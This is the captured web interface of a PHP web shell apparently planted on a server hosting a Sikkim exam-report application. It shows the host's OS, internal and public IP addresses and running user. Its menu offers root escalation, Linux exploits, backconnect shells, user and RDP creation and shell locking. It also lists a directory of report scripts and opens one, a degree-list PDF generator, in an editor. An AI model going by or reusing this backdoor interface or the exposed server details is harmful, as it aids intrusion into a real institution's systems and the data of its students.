Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.226.98.244
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sikkim /
Report_details19042016 /
[ HOME SHELL ]
Name
Size
Permission
Action
output
[ DIR ]
drwxr-xr-x
DownloadExamAppFormApplication...
5.03
KB
-rwxr-xr-x
DownloadRvRtAckApplications.ph...
4.56
KB
-rwxr-xr-x
PrintChallanEntryDetails.php
7.73
KB
-rwxr-xr-x
RvRtApplicationReport.php
8.76
KB
-rwxr-xr-x
batch_wise_details.php
4.45
KB
-rwxr-xr-x
report_admission_list.php
6.75
KB
-rwxr-xr-x
report_admission_list_26092013...
6.67
KB
-rwxr-xr-x
report_admission_ticket.php
10.47
KB
-rwxr-xr-x
report_attendance_summary.php
6.82
KB
-rwxr-xr-x
report_batch_wise_details.php
7.49
KB
-rwxr-xr-x
report_batch_worksheet_details...
10.41
KB
-rwxr-xr-x
report_candidate_list.php
16.42
KB
-rwxr-xr-x
report_candidate_list06032013....
16.21
KB
-rwxr-xr-x
report_candidate_list_final.ph...
9.85
KB
-rwxr-xr-x
report_daliy_report.php
10.73
KB
-rwxr-xr-x
report_degree_list.php
2.45
KB
-rwxr-xr-x
report_deviation_report.php
8.61
KB
-rwxr-xr-x
report_deviation_report130312....
7.77
KB
-rwxr-xr-x
report_deviation_report1907201...
7.8
KB
-rwxr-xr-x
report_evaluation_report.php
9.32
KB
-rwxr-xr-x
report_evaluation_report040720...
9.32
KB
-rwxr-xr-x
report_marks_deviation_report....
5.38
KB
-rwxr-xr-x
report_marks_entry_student_lis...
5.04
KB
-rwxr-xr-x
report_marks_entry_subwise_lis...
10.41
KB
-rwxr-xr-x
report_marks_entry_subwise_lis...
10.47
KB
-rwxr-xr-x
report_online_eam.php
10.99
KB
-rwxr-xr-x
report_practical_marks_details...
13.45
KB
-rwxr-xr-x
report_revaluation.php
4.39
KB
-rwxr-xr-x
report_subject_admcl_list.php
3.48
KB
-rwxr-xr-x
report_subject_general_list.ph...
4.12
KB
-rwxr-xr-x
subject_wise_student_list.php
6.68
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : report_degree_list.php
<?php function generateDegreeReport($aobj_context) { session_start(); $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $college_code = $_SESSION['collcode']; $degree_types = $aobj_context->mobj_data["degree_types"]; $main_src_obj=(explode("/",$_SERVER["REQUEST_URI"])); $main_src=$main_src_obj[1]; $pdf_writer_class=$aobj_context->main_src."/maya-pdf/fpdf.php"; $root_pdf_file_download=$aobj_context->main_src."/Report_details/output/report".$_SESSION['user_id']."_".$report_id.".pdf"; // global varibales $p_count =1; // end global varibales //echo $pdf_writer_class; include($pdf_writer_class); $pdf= new FPDF(); $pdf->SetFont('Times','',10); $pdf->SetMargins(32,10); $pdf->AliasNbPages(); // query for the page header $page_header_university = "select FUNIVNAME,FTOWN, date_format(now(),'%d/%m/%Y') as date from control"; $lobj_page_header_university = $aobj_context->mobj_db->GetRow($page_header_university); $page_header_college ="select concat('[',FCOLLCODE,'] ',FCOLLNAME,', ',FTOWN) as college_name from college where FCOLLCODE='{$college_code}'"; $lobj_page_header_college = $aobj_context->mobj_db->GetRow($page_header_college); $pdf->aobj_context =$aobj_context ; $pdf->WhichReport = 'CollegeDegree'; $pdf->FUNIVNAME = $lobj_page_header_university[FUNIVNAME]; $pdf->FTOWN = $lobj_page_header_university[FTOWN]; $pdf->date_1 = $lobj_page_header_university['date']; $pdf->college_name = $lobj_page_header_college['college_name']; $pdf->AddPage(); $pdf->Ln(); $pdf->SetFont('Times','',10); if($degree_types =='SELECTED') { $get_data= " select distinct c.FDEGREE as 'Degree Code', d.FDESCPN as 'Degree Description' from colldeg c inner join degree d on c.FDEGREE = d.FDEGREE and c.FCOLLCODE='{$college_code}' and c.FDELETED='F'"; } else { $get_data=" select distinct FDEGREE as 'Degree Code', FDESCPN as 'Degree Description' from degree"; } $lobj_details = $aobj_context->mobj_db->GetAll($get_data); //echo "<pre>"; print_r($lobj_details); die(); $header_row=(array_keys($lobj_details[0])); foreach($header_row as $key1 => $value1) $pdf->Cell(75,6,$value1,1,'LR','C'); $pdf->Ln(); foreach($lobj_details as $key => $value) { foreach($value as $key2 => $value2) { if($key2 == 'Degree Description') $align = "L"; else $align = "C"; $pdf->Cell(75,6,$value2,1,'LR',"{$align}"); } $pdf->Ln(); } $pdf->Output("degree_lists.pdf","D"); } ?>
Close